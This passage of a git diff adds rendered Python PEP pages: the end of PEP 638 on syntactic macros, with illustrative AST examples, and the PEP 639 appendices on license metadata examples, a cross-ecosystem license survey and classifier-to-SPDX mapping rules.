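+    """Stand-in processor: rewrite double_(x) into (x) * 2."""
+    def visit_Call(self, node):
+        self.generic_visit(node)
+        if isinstance(node.func, ast.Name) and node.func.id == "double_":
+            return ast.BinOp(left=node.args[0], op=ast.Mult(),
+                             right=ast.Constant(2))
+        return node
+
+tree = ast.parse("y = double_(21)")
+tree = ast.fix_missing_locations(DoubleMacro().visit(tree))
+namespace = {}
+exec(compile(tree, "<macro>", "exec"), namespace)
+assert namespace["y"] == 42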

For macros with multiple names, several trees will be passed to the macro processor, but only one will be returned and substituted, shortening the enclosing block of statements.

+

This process can be repeated, +to enable macros to return AST nodes including other macros.

+

The compiler will not look up a macro processor until that macro is reached, +so that inner macros do not need to have processors registered. +For example, in a switch macro, the case and default macros wouldn’t +need processors registered as they would be eliminated by the switch processor.

+

To enable definition of macros to be imported, +the macros import! and from! are predefined. +They support the following syntax:

+
"import!" dotted_name "as" name
+
+"from!" dotted_name "import" name [ "as" name ]
+
+
+

The import! macro performs a compile-time import of dotted_name +to find the macro processor, then registers it under name +for the scope currently being compiled.

+

The from! macro performs a compile-time import of dotted_name.name +to find the macro processor, then registers it under name +(using the name following “as”, if present) +for the scope currently being compiled.

+

Note that, since import! and from! only define the macro for the +scope in which the import is present, all uses of a macro must be preceded by +an explicit import! or from! to improve clarity.

+

For example, to import the macro “compile” from “my.compiler”:

+
from! my.compiler import compile
+
+
+
+
+

Defining macro processors

+

A macro processor is defined by a four-tuple, consisting of +(func, kind, version, additional_names):

+
    +
  • func must be a callable that takes len(additional_names)+1 arguments, all of which are abstract syntax trees, and returns a single abstract syntax tree.
  • +
  • kind must be one of the following:
      +
    • macros.STMT_MACRO: A statement macro where the body of the macro is indented. This is the only form allowed to have additional names.
    • +
    • macros.SIBLING_MACRO: A statement macro where the body of the macro is the next statement in the same block. The following statement is moved into the macro as its body.
    • +
    • macros.EXPR_MACRO: An expression macro.
    • +
    +
  • +
  • version is used to track versions of macros, so that generated bytecodes can be correctly cached. It must be an integer.
  • +
  • additional_names are the names of the additional parts of the macro, and must be a tuple of strings.
  • +
+
# (func, macros.STMT_MACRO, VERSION, ())
+stmt_macro!:
+    multi_statement_body
+
+# (func, macros.SIBLING_MACRO, VERSION, ())
+sibling_macro!
+single_statement_body
+
+# (func, macros.EXPR_MACRO, VERSION, ())
+x = expr_macro!(...)
+
+# (func, macros.STMT_MACRO, VERSION, ("subsequent_macro_part",))
+multi_part_macro!:
+    multi_statement_body
+subsequent_macro_part!:
+    multi_statement_body
+
+
+

The compiler will check that the syntax used matches the declared kind.

+

For convenience, the decorator macro_processor is provided in the macros module to mark a function as a macro processor:

+
def macro_processor(kind, version, *additional_names):
+    def deco(func):
+        return func, kind, version, additional_names
+    return deco
+
+
+

This can be used to help declare macro processors, for example:

+
@macros.macro_processor(macros.STMT_MACRO, 1_08)
+def switch(astnode):
+    ...
+
+
+
+
+

AST extensions

+

Two new AST nodes will be needed to express macros, macro_stmt and macro_expr.

+
class macro_stmt(_ast.stmt):
+    _fields = "name", "args", "importname", "asname", "body"
+
+class macro_expr(_ast.expr):
+    _fields = "name", "args"
+
+
+

In addition, macro processors will need a means to express control flow or side-effecting code that produces a value. A new AST node called stmt_expr will be added, combining a statement and an expression. This new ast node will be a subtype of expr, but include a statement to allow side effects. It will be compiled to bytecode by compiling the statement, then compiling the value.

+
class stmt_expr(_ast.expr):
+    _fields = "stmt", "value"
+
+
+
+
+

Hygiene and debugging

+

Macro processors will often need to create new variables. Those variables need to be named in such a way as to avoid contaminating the original code and other macros. No rules for naming will be enforced, but to ensure hygiene and help debugging, the following naming scheme is recommended:

+
    +
  • All generated variable names should start with a $
  • +
  • Purely artificial variable names should start $$mname where mname is the name of the macro.
  • +
  • Variables derived from real variables should start $vname where vname is the name of the variable.
  • +
  • All variable names should include the line number and the column offset, separated by an underscore.
  • +
+

Examples:

+
    +
  • Purely generated name: $$macro_17_0
  • +
  • Name derived from a variable for an expression macro: $var_12_5
  • +
+
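A sketch of name generation following this scheme (it is purely a convention; nothing in the proposal enforces it):

def artificial_name(macro_name, lineno, col_offset):
+    return f"$${macro_name}_{lineno}_{col_offset}"
+
+def derived_name(var_name, lineno, col_offset):
+    return f"${var_name}_{lineno}_{col_offset}"
+
+assert artificial_name("macro", 17, 0) == "$$macro_17_0"
+assert derived_name("var", 12, 5) == "$var_12_5"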
+
+
+

Examples

+
+

Compile-time-checked data structures

+

It is common to encode tables of data in Python as large dictionaries. +However, these can be hard to maintain and error prone. +Macros allow such data to be written in a more readable format. +Then, at compile time, the data can be verified and converted to an efficient format.

+

For example, suppose we have two dictionary literals mapping names to codes, and vice versa. This is error prone, as the dictionaries may have duplicate keys, or one table may not be the inverse of the other. A macro could generate the two mappings from a single table and, at the same time, verify that no duplicates are present.

+
color_to_code = {
+    "red": 1,
+    "blue": 2,
+    "green": 3,
+}
+
+code_to_color = {
+    1: "red",
+    2: "blue",
+    3: "yellow", # error
+}
+
+
+

would become:

+
bijection! color_to_code, code_to_color:
+    "red" = 1
+    "blue" = 2
+    "green" = 3
+
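A runtime sketch of the consistency check such a macro could perform at compile time, using a hypothetical bijection helper that builds both mappings from one table:

def bijection(table):
+    forward, backward = {}, {}
+    for name, code in table:
+        if name in forward or code in backward:
+            raise ValueError(f"duplicate entry: {name!r} / {code!r}")
+        forward[name] = code
+        backward[code] = name
+    return forward, backward
+
+color_to_code, code_to_color = bijection([
+    ("red", 1), ("blue", 2), ("green", 3),
+])
+assert code_to_color[2] == "blue"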
+
+
+
+

Domain-specific extensions

+

Where I see macros having real value is in specific domains, not in general-purpose language features.

+

For example, parsers. +Here’s part of a parser definition for Python, using macros:

+
choice! single_input:
+    NEWLINE
+    simple_stmt
+    sequence!:
+        compound_stmt
+        NEWLINE
+
+
+
+
+

Compilers

+

Runtime compilers, such as numba, have to reconstitute the Python source, or attempt to analyze the bytecode. It would be simpler and more reliable for them to get the AST directly:

+
from! my.jit.library import jit
+
+jit!
+def func():
+    ...
+
+
+
+
+

Matching symbolic expressions

+

When matching something representing syntax, such as a Python ast node or a sympy expression, it is convenient to match against the actual syntax, not the data structure representing it. For example, a calculator could be implemented using a domain-specific macro for matching syntax:

+
from! ast_matcher import match
+
+def calculate(node):
+    if isinstance(node, Num):
+        return node.n
+    match! node:
+        case! a + b:
+            return calculate(a) + calculate(b)
+        case! a - b:
+            return calculate(a) - calculate(b)
+        case! a * b:
+            return calculate(a) * calculate(b)
+        case! a / b:
+            return calculate(a) / calculate(b)
+
+
+

Which could be converted to:

+
def calculate(node):
+    if isinstance(node, Num):
+        return node.n
+    $$match_4_0 = node
+    if isinstance($$match_4_0, _ast.Add):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) + calculate(b)
+    elif isinstance($$match_4_0, _ast.Sub):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) - calculate(b)
+    elif isinstance($$match_4_0, _ast.Mul):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) * calculate(b)
+    elif isinstance($$match_4_0, _ast.Div):
+        a, b = $$match_4_0.left, $$match_4_0.right
+        return calculate(a) / calculate(b)
+
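A version of the expanded code that runs on current Python can be written against the standard ast module (modern Python represents numbers as ast.Constant rather than the deprecated Num used above):

import ast
+
+def calculate(node):
+    if isinstance(node, ast.Constant):
+        return node.value
+    if isinstance(node, ast.BinOp):
+        a, b = calculate(node.left), calculate(node.right)
+        if isinstance(node.op, ast.Add):
+            return a + b
+        if isinstance(node.op, ast.Sub):
+            return a - b
+        if isinstance(node.op, ast.Mult):
+            return a * b
+        if isinstance(node.op, ast.Div):
+            return a / b
+    raise ValueError(f"unsupported node: {node!r}")
+
+tree = ast.parse("1 + 2 * 3", mode="eval")
+assert calculate(tree.body) == 7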
+
+
+
+

Zero-cost markers and annotations

+

Annotations, either decorators or PEP 3107 function annotations, have a runtime cost +even if they serve only as markers for checkers or as documentation.

+
@do_nothing_marker
+def foo(...):
+    ...
+
+
+

can be replaced with the zero-cost macro:

+
do_nothing_marker!:
+def foo(...):
+    ...
+
+
+
+
+

Prototyping language extensions

+

Although macros would be most valuable for domain-specific extensions, it is possible to +demonstrate possible language extensions using macros.

+
+
f-strings:
+

The f-string f"..." could be implemented as a macro, as f!("..."). Not quite as nice to read, but it would still be useful for experimenting with.

+
+
+
Try finally statement:
+
try_!:
+    body
+finally!:
+    closing
+
+
+

Would be translated roughly as:

+
try:
+    body
+except:
+    closing
+else:
+    closing
+
+
+
+
Note:
Care must be taken to handle returns, breaks and continues correctly. +The above code is merely illustrative.
+
+
+
+
With statement:
+
with! open(filename) as fd:
+    return fd.read()
+
+
+

The above would require handling open specially. A more explicit alternative would be:

+
with! open!(filename) as fd:
+    return fd.read()
+
+
+
+
+
+

Macro definition macros

+

Languages that have syntactic macros usually provide a macro for defining macros. +This PEP intentionally does not do that, as it is not yet clear what a good design +would be, and we want to allow the community to define their own macros.

+

One possible form could be:

+
macro_def! name:
+    input:
+        ... # input pattern, defining meta-variables
+    output:
+        ... # output pattern, using meta-variables
+
+
+
+
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Performance Implications

+

For code that doesn’t use macros, there will be no effect on performance.

+

For code that does use macros and has already been compiled to bytecode, there will be some slight overhead to check that the versions of the macros used to compile the code match the imported macro processors.

+

For code that has not been compiled, or was compiled with different versions of the macro processors, there would be the usual overhead of bytecode compilation, plus any additional overhead of macro processing.

+

It is worth noting that the speed of source to bytecode compilation +is largely irrelevant for Python performance.

+
+
+

Implementation

+

In order to allow transformation of the AST at compile time by Python code, +all AST nodes in the compiler will have to be Python objects.

+

Doing that efficiently will mean making all the nodes in the _ast module immutable, so as not to degrade performance by much. They will need to be immutable to guarantee that the AST remains a tree, to avoid having to support cyclic GC. Making them immutable means they will not have a __dict__ attribute, making them compact.

+

AST nodes in the ast module will remain mutable.

+

Currently, all AST nodes are allocated using an arena allocator. +Changing to use the standard allocator might slow compilation down a little, +but has advantages in terms of maintenance, as much code can be deleted.

+
+

Reference Implementation

+

None as yet.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0638.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-examples/index.html b/pep-0639/appendix-examples/index.html new file mode 100644 index 00000000000..b0a6bcddf8b --- /dev/null +++ b/pep-0639/appendix-examples/index.html @@ -0,0 +1,271 @@ + + + + + + + + Appendix: Licensing Examples | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: Licensing Examples

+
+

Abstract

+

This document contains guidance on applying PEP 639 in real-life examples.

+
+
+

Examples

+
+

Basic example

+

The Setuptools project itself, as of version 59.1.1, +does not use the License field in its own project source metadata. +Further, it no longer explicitly specifies license_file/license_files +as it did previously, since Setuptools relies on its own automatic +inclusion of license-related files matching common patterns, +such as the LICENSE file it uses.

+

It includes the following license-related metadata in its setup.cfg:

+
[metadata]
+classifiers =
+    License :: OSI Approved :: MIT License
+
+
+

The simplest migration to PEP 639 would consist of using this instead:

+
[metadata]
+license_expression = MIT
+
+
+

Or, in the [project] table of pyproject.toml:

+
[project]
+license = "MIT"
+
+
+

The output Core Metadata for the distribution packages would then be:

+
License-Expression: MIT
+License-File: LICENSE
+
+
+

The LICENSE file would be stored at /setuptools-${VERSION}/LICENSE +in the sdist and /setuptools-${VERSION}.dist-info/licenses/LICENSE +in the wheel, and unpacked from there into the site directory (e.g. +site-packages) on installation; / is the root of the respective archive +and ${VERSION} the version of the Setuptools release in the Core Metadata.
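Once installed, the new fields can be read back from the Core Metadata; a sketch using the standard importlib.metadata, assuming a package built with a PEP 639-aware backend:

from importlib.metadata import metadata
+
+md = metadata("setuptools")           # an email.message.Message-like object
+print(md.get("License-Expression"))   # e.g. MIT
+print(md.get_all("License-File"))     # e.g. ['LICENSE']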

+
+
+

Advanced example

+

Suppose Setuptools were to include the licenses of the third-party projects +that are vendored in the setuptools/_vendor/ and pkg_resources/_vendor +directories; specifically:

+
packaging==21.2
+pyparsing==2.2.1
+ordered-set==3.1.1
+more_itertools==8.8.0
+
+
+

The license expressions for these projects are:

+
packaging: Apache-2.0 OR BSD-2-Clause
+pyparsing: MIT
+ordered-set: MIT
+more_itertools: MIT
+
+
+

A comprehensive license expression covering both Setuptools proper and its vendored dependencies would combine all of these license expressions into one. Such an expression might be:

+
MIT AND (Apache-2.0 OR BSD-2-Clause)
+
+
+

In addition, per the requirements of the licenses, the relevant license files +must be included in the package. Suppose the LICENSE file contains the text +of the MIT license and the copyrights used by Setuptools, pyparsing, +more_itertools and ordered-set; and the LICENSE* files in the +setuptools/_vendor/packaging/ directory contain the Apache 2.0 and +2-clause BSD license text, and the Packaging copyright statement and +license choice notice.

+

Specifically, we assume the license files are located at the following +paths in the project source tree (relative to the project root and +pyproject.toml):

+
LICENSE
+setuptools/_vendor/packaging/LICENSE
+setuptools/_vendor/packaging/LICENSE.APACHE
+setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

Putting it all together, our setup.cfg would be:

+
[metadata]
+license_expression = MIT AND (Apache-2.0 OR BSD-2-Clause)
+license_files =
+    LICENSE
+    setuptools/_vendor/packaging/LICENSE
+    setuptools/_vendor/packaging/LICENSE.APACHE
+    setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the [project] table of pyproject.toml, license files +can be specified via glob patterns:

+
[project]
+license = "MIT AND (Apache-2.0 OR BSD-2-Clause)"
+license-files = [
+    "LICENSE*",
+    "setuptools/_vendor/LICENSE*",
+]
+
+
+

Or alternatively, they can be specified explicitly (paths will be interpreted +as glob patterns):

+
[project]
+license = "MIT AND (Apache-2.0 OR BSD-2-Clause)"
+license-files = [
+    "LICENSE",
+    "setuptools/_vendor/LICENSE",
+    "setuptools/_vendor/LICENSE.APACHE",
+    "setuptools/_vendor/LICENSE.BSD",
+]
+
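A sketch of how a build backend might expand such patterns relative to the project root, using only the standard glob module:

from glob import glob
+
+patterns = [
+    "LICENSE*",
+    "setuptools/_vendor/packaging/LICENSE*",
+]
+license_files = sorted(
+    path for pattern in patterns for path in glob(pattern)
+)
+for path in license_files:
+    print(f"License-File: {path}")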
+
+

With either approach, the output Core Metadata in the distribution +would be:

+
License-Expression: MIT AND (Apache-2.0 OR BSD-2-Clause)
+License-File: LICENSE
+License-File: setuptools/_vendor/packaging/LICENSE
+License-File: setuptools/_vendor/packaging/LICENSE.APACHE
+License-File: setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the resulting sdist, with / as the root of the archive and ${VERSION} +the version of the Setuptools release specified in the Core Metadata, +the license files would be located at the paths:

+
/setuptools-${VERSION}/LICENSE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE.APACHE
+/setuptools-${VERSION}/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

In the built wheel, with / being the root of the archive and +${VERSION} as the previous, the license files would be stored at:

+
/setuptools-${VERSION}.dist-info/licenses/LICENSE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.APACHE
+/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+

Finally, in the installed project, with site-packages being the site dir +and ${VERSION} as the previous, the license files would be installed to:

+
site-packages/setuptools-${VERSION}.dist-info/licenses/LICENSE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.APACHE
+site-packages/setuptools-${VERSION}.dist-info/licenses/setuptools/_vendor/packaging/LICENSE.BSD
+
+
+
+
+

Expression examples

+

Some additional examples of valid License-Expression values:

+
License-Expression: MIT
+License-Expression: BSD-3-Clause
+License-Expression: MIT AND (Apache-2.0 OR BSD-2-clause)
+License-Expression: MIT OR GPL-2.0-or-later OR (FSFUL AND BSD-2-Clause)
+License-Expression: GPL-3.0-only WITH Classpath-Exception-2.0 OR BSD-3-Clause
+License-Expression: LicenseRef-Public-Domain OR CC0-1.0 OR Unlicense
+License-Expression: LicenseRef-Proprietary
+License-Expression: LicenseRef-Custom-License
+
+
+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-license-survey/index.html b/pep-0639/appendix-license-survey/index.html new file mode 100644 index 00000000000..80b165a8cf2 --- /dev/null +++ b/pep-0639/appendix-license-survey/index.html @@ -0,0 +1,365 @@ + + + + + + + + Appendix: License Documentation in Python and Other Projects | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Appendix: License Documentation in Python and Other Projects

+
+

Abstract

+

There are multiple ways, in use or recommended, to document licenses. This document contains the results of a comprehensive survey of license documentation in Python and other languages.

+

The key takeaways from the survey, which have guided the recommendations of +PEP 639, are as follows:

+
    +
  • Most package formats use a single License field.
  • +
  • Many modern package systems use some form of license expression +to optionally combine more than one license identifier together. +SPDX and SPDX-like syntaxes are the most popular in use.
  • +
  • SPDX license identifiers are becoming the de facto way to reference common +licenses everywhere, whether or not a full license expression syntax is used.
  • +
  • Several package formats support documenting both a license expression and the +paths of the corresponding files that contain the license text. Most Free and +Open Source Software licenses require package authors to include their full +text in a Distribution Package.
  • +
+
+
+

License Documentation in Python

+
+

Core Metadata

+

There are two overlapping Core Metadata fields to document a license: the +license Classifier strings prefixed with License :: +and the License field as free text.

+

The Core Metadata License field documentation is currently:

+
License
+=======
+
+.. versionadded:: 1.0
+
+Text indicating the license covering the distribution where the license
+is not a selection from the "License" Trove classifiers. See
+:ref:`"Classifier" <metadata-classifier>` below.
+This field may also be used to specify a
+particular version of a license which is named via the ``Classifier``
+field, or to indicate a variation or exception to such a license.
+
+Examples::
+
+    License: This software may only be obtained by sending the
+            author a postcard, and then the user promises not
+            to redistribute it.
+
+    License: GPL version 3, excluding DRM provisions
+
+
+

Even though there are two fields, it is at times difficult to convey anything but simple licensing. For instance, some classifiers lack precision (GPL without a version), and when multiple license classifiers are listed, it is not clear whether both licenses must apply, or whether the user may choose between them. Furthermore, the list of available license classifiers is rather limited and out-of-date.

+
+
+

Setuptools and Wheel

+

Beyond a license code or qualifier, license text files are documented and +included in a built package either implicitly or explicitly, +and this is another possible source of confusion:

+
    +
  • In the Setuptools and Wheel projects, +license files are automatically added to the distribution (at their source +location in a source distribution/sdist, and in the .dist-info +directory of a built wheel) if they match one of a number of common license +file name patterns (LICEN[CS]E*, COPYING*, NOTICE* and +AUTHORS*). Alternatively, a package author can specify a list of license +file paths to include in the built wheel under the license_files key in +the [metadata] section of the project’s setup.cfg, or as an argument +to the setuptools.setup() function. At present, following the Wheel +project’s lead, Setuptools flattens the collected license files into the +metadata directory, clobbering files with the same name, and dumps license +files directly into the top-level .dist-info directory, but there is a +desire to resolve both these issues, +contingent on PEP 639 being accepted.
  • +
  • Both tools also support an older, singular license_file parameter that +allows specifying only one license file to add to the distribution, which +has been deprecated for some time but still sees some use.
  • +
  • Following the publication of an earlier draft of PEP 639, Setuptools +added support for License-File in distribution +metadata as described in this specification. This allows other tools +consuming the resulting metadata to unambiguously locate the license file(s) +for a given package.
  • +
+
+
+

PyPA Packaging Guide and Sample Project

+

Both the PyPA beginner packaging tutorial and its more +comprehensive packaging guide state that it is +important that every package include a license file. They point to the +LICENSE.txt in the official PyPA sample project as an example, which is +explicitly listed under the license_files key in +its setup.cfg, following existing practice formally specified by PEP 639.

+

Both the beginner packaging tutorial and the +sample project only use classifiers to declare a +package’s license, and do not include or mention the License field. +The full packaging guide does mention this field, but +states that authors should use the license classifiers instead, unless the +project uses a non-standard license (which the guide discourages).

+
+
+

Python source code files

+

Note: Documenting licenses in source code is not in the scope of PEP 639.

+

Beside using comments and/or SPDX-License-Identifier conventions, the +license is sometimes documented in Python code files using +a “dunder” module-level constant, typically named __license__.

+

This convention, while perhaps somewhat antiquated, is recognized by the +built-in help() function and the standard pydoc module. +The dunder variable will show up in the help() DATA section for a module.

+
+
+
+

License Documentation in Other Projects

+
+

Linux distribution packages

+

Note: in most cases, the texts of the most common licenses are included +globally in a shared documentation directory (e.g. /usr/share/doc).

+
    +
  • Debian documents package licenses with +machine readable copyright files. +It defines its own license expression syntax and list of identifiers for +common licenses, both of which are closely related to those of SPDX.
  • +
  • Fedora packages specify how to include +License Texts and use a +License field that must be filled +with appropriate short license identifier(s) from an extensive list +of “Good Licenses”. Fedora uses SPDX +license expression syntax.
  • +
  • OpenSUSE packages use SPDX license expressions with +SPDX license IDs and a +list of additional license identifiers.
  • +
  • Gentoo ebuild uses a LICENSE variable. +This field is specified in GLEP-0023 and in the +Gentoo development manual. +Gentoo also defines a list of allowed licenses and a license expression +syntax, which is rather different from SPDX.
  • +
  • The FreeBSD package Makefile provides LICENSE and +LICENSE_FILE fields with a list of custom license symbols. For +non-standard licenses, FreeBSD recommends using LICENSE=UNKNOWN and +adding LICENSE_NAME and LICENSE_TEXT fields, as well as sophisticated +LICENSE_PERMS to qualify the license permissions and LICENSE_GROUPS +to document a license grouping. The LICENSE_COMB allows documenting more +than one license and how they apply together, forming a custom license +expression syntax. FreeBSD also recommends the use of +SPDX-License-Identifier in source code files.
  • +
  • Arch Linux PKGBUILD defines its +own license identifiers. +The value 'unknown' can be used if the license is not defined.
  • +
  • OpenWRT ipk packages use the PKG_LICENSE and +PKG_LICENSE_FILES variables and recommend the use of SPDX License +identifiers.
  • +
  • NixOS uses SPDX identifiers and some extra license IDs +in its license field.
  • +
  • GNU Guix (based on NixOS) has a single License field, uses its own +license symbols list and specifies how to use one license or a +list of them.
  • +
  • Alpine Linux packages recommend using SPDX identifiers in the +license field.
  • +
+
+
+

Language and application packages

+
    +
  • In Java, Maven POM defines a licenses XML tag with a list +of licenses, each with a name, URL, comments and “distribution” type. +This is not mandatory, and the content of each field is not specified.
  • +
  • The JavaScript NPM package.json uses a single license field with +a SPDX license expression, or the UNLICENSED ID if none is specified. +A license file can be referenced as an alternative using +SEE LICENSE IN <filename> in the single license field.
  • +
  • Rubygems gemspec specifies either a single or list of license +strings. The relationship between multiple licenses in a +list is not specified. They recommend using SPDX license identifiers.
  • +
  • CPAN Perl modules use a single license field, which is either a +single or a list of strings. The relationship between the licenses in +a list is not specified. There is a list of custom license identifiers plus +these generic identifiers: open_source, restricted, unrestricted, +unknown.
  • +
  • Rust Cargo specifies the use of an SPDX license expression +(v2.1) in the license field. It also supports an alternative expression +syntax using slash-separated SPDX license identifiers, and there is also a +license_file field. The crates.io package registry +requires that either license or license_file fields are set when +uploading a package.
  • +
  • PHP composer.json uses a license field with an SPDX license ID or proprietary. The license field is either a single string resembling the SPDX license expression syntax, with and and or keywords; or a list of strings if there is a (disjunctive) choice of licenses.
  • +
  • NuGet packages previously used only a simple license URL, but +now specify using a SPDX license expression and/or the path to a license +file within the package. The NuGet.org repository states that they only +accept license expressions that are “approved by the Open Source Initiative +or the Free Software Foundation.”
  • +
  • Go language modules go.mod have no provision for any metadata beyond +dependencies. Licensing information is left for code authors and other +community package managers to document.
  • +
  • The Dart/Flutter spec recommends using a single LICENSE +file that should contain all the license texts, each separated by a line +with 80 hyphens.
  • +
  • The JavaScript Bower license field is either a single string +or list of strings using either SPDX license identifiers, or a path/URL +to a license file.
  • +
  • The Cocoapods podspec license field is either a single +string, or a mapping with type, file and text keys. +This is mandatory unless there is a LICENSE/LICENCE file provided.
  • +
  • Haskell Cabal accepts an SPDX license expression since +version 2.2. The version of the SPDX license list used is a function of +the Cabal version. The specification also provides a mapping between +legacy (pre-SPDX) and SPDX license Identifiers. Cabal also specifies a +license-file(s) field that lists license files to be installed with +the package.
  • +
  • Erlang/Elixir mix/hex package specifies a licenses field as a +required list of license strings, and recommends using SPDX license +identifiers.
  • +
  • D language dub packages define their own list of license identifiers and license expression syntax, similar to the SPDX standard.
  • +
  • The R Package DESCRIPTION defines its own sophisticated license +expression syntax and list of licenses identifiers. R has a unique way of +supporting specifiers for license versions (such as LGPL (>= 2.0, < 3)) +in its license expression syntax.
  • +
+
+
+

Other ecosystems

+
    +
  • The SPDX-License-Identifier header is a simple +convention to document the license inside a file.
  • +
  • The Free Software Foundation (FSF) promotes the use of +SPDX license identifiers for clarity in the GPL and other +versioned free software licenses.
  • +
  • The Free Software Foundation Europe (FSFE) REUSE project +promotes using SPDX-License-Identifier.
  • +
  • The Linux kernel uses SPDX-License-Identifier +and parts of the FSFE REUSE conventions to document its licenses.
  • +
  • U-Boot spearheaded using SPDX-License-Identifier in code +and now follows the Linux approach.
  • +
  • The Apache Software Foundation projects use RDF DOAP with +a single license field pointing to SPDX license identifiers.
  • +
  • The Eclipse Foundation promotes using +SPDX-license-Identifiers.
  • +
  • The ClearlyDefined project promotes using SPDX +license identifiers and expressions to improve license clarity.
  • +
  • The Android Open Source Project uses MODULE_LICENSE_XXX +empty tag files, where XXX is a license code such as BSD, APACHE, +GPL, etc. It also uses a NOTICE file that contains license and +notice texts.
  • +
+
+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0639/appendix-mapping-classifiers/index.html b/pep-0639/appendix-mapping-classifiers/index.html new file mode 100644 index 00000000000..219f076a418 --- /dev/null +++ b/pep-0639/appendix-mapping-classifiers/index.html @@ -0,0 +1,185 @@ + + + + + + + + Appendix: Mapping License Classifiers to SPDX Identifiers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+


+ + +
+
+
+

Appendix: Mapping License Classifiers to SPDX Identifiers

+

Most single license classifiers (namely, all those not mentioned below) +map to a single valid SPDX license identifier, +allowing tools to infer the SPDX license identifier they correspond to, +both for use when analyzing and auditing packages, +and providing a semi-automated mechanism of filling the license key +or the License-Expression field +following the PEP 639 specification.
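As an illustrative sketch, such an inference table can be a plain dictionary; the entries and function below are hypothetical examples, not the normative mapping:

# Hypothetical excerpt; a real tool would cover every unambiguous classifier.
CLASSIFIER_TO_SPDX = {
    "License :: OSI Approved :: MIT License": "MIT",
    "License :: OSI Approved :: ISC License (ISCL)": "ISC",
    "License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)":
        "GPL-3.0-or-later",
}

def infer_license_expression(classifiers):
    """Infer an SPDX identifier only from a single, unambiguous classifier."""
    license_classifiers = [c for c in classifiers if c.startswith("License ::")]
    if len(license_classifiers) != 1:
        return None  # multiple classifiers are ambiguous (see below)
    return CLASSIFIER_TO_SPDX.get(license_classifiers[0])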

+

Some legacy license classifiers intend to specify a particular license, but do not specify its particular version or variant, leading to a critical ambiguity as to their terms, compatibility and acceptability. Without affirmative user action, tools MUST NOT attempt to automatically infer a License-Expression when one of these classifiers is used:

+
    +
  • License :: OSI Approved :: Academic Free License (AFL)
  • +
  • License :: OSI Approved :: Apache Software License
  • +
  • License :: OSI Approved :: Apple Public Source License
  • +
  • License :: OSI Approved :: Artistic License
  • +
  • License :: OSI Approved :: BSD License
  • +
  • License :: OSI Approved :: GNU Affero General Public License v3
  • +
  • License :: OSI Approved :: GNU Free Documentation License (FDL)
  • +
  • License :: OSI Approved :: GNU General Public License (GPL)
  • +
  • License :: OSI Approved :: GNU General Public License v2 (GPLv2)
  • +
  • License :: OSI Approved :: GNU General Public License v3 (GPLv3)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)
  • +
  • License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)
  • +
  • License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)
  • +
+

A comprehensive mapping of these classifiers to their possible specific identifiers was assembled by Dustin Ingram, which tools MAY use as a reference for the identifier selection options to offer when prompting users to explicitly select the license identifier they intended for their project.

+
+

Note

+

Several additional classifiers, namely the “or later” variants of +the AGPLv3, GPLv2, GPLv3 and LGPLv3, are also listed in the aforementioned +mapping, but unambiguously map to their respective licenses, +and so are not listed here. +However, LGPLv2 is included above, as it could ambiguously +refer to either the distinct v2.0 or v2.1 variants of that license.

+
+

In addition, for the various special cases, the following mappings are +considered canonical and normative for the purposes of this specification:

+
    +
  • Classifier License :: Public Domain MAY be mapped to the generic +License-Expression: LicenseRef-Public-Domain. +If tools do so, they SHOULD issue an informational warning encouraging +the use of more explicit and legally portable license identifiers, +such as those for the CC0 1.0 license (CC0-1.0), +the Unlicense (Unlicense), +or the MIT license (MIT), +since the meaning associated with the term “public domain” is thoroughly +dependent on the specific legal jurisdiction involved, +some of which lack the concept entirely. +Alternatively, tools MAY choose to treat these classifiers as ambiguous.
  • +
  • The generic and sometimes ambiguous classifiers:
      +
    • License :: Free For Educational Use
    • +
    • License :: Free For Home Use
    • +
    • License :: Free for non-commercial use
    • +
    • License :: Freely Distributable
    • +
    • License :: Free To Use But Restricted
    • +
    • License :: Freeware
    • +
    • License :: Other/Proprietary License
    • +
    +

    MAY be mapped to the generic +License-Expression: LicenseRef-Proprietary, +but tools MUST issue a prominent, informative warning if they do so. +Alternatively, tools MAY choose to treat these classifiers as ambiguous.

    +
  • +
  • The generic and ambiguous classifiers License :: OSI Approved and License :: DFSG approved do not map to any license expression; tools SHOULD treat them as ambiguous or, failing that, MUST ignore them.
  • +
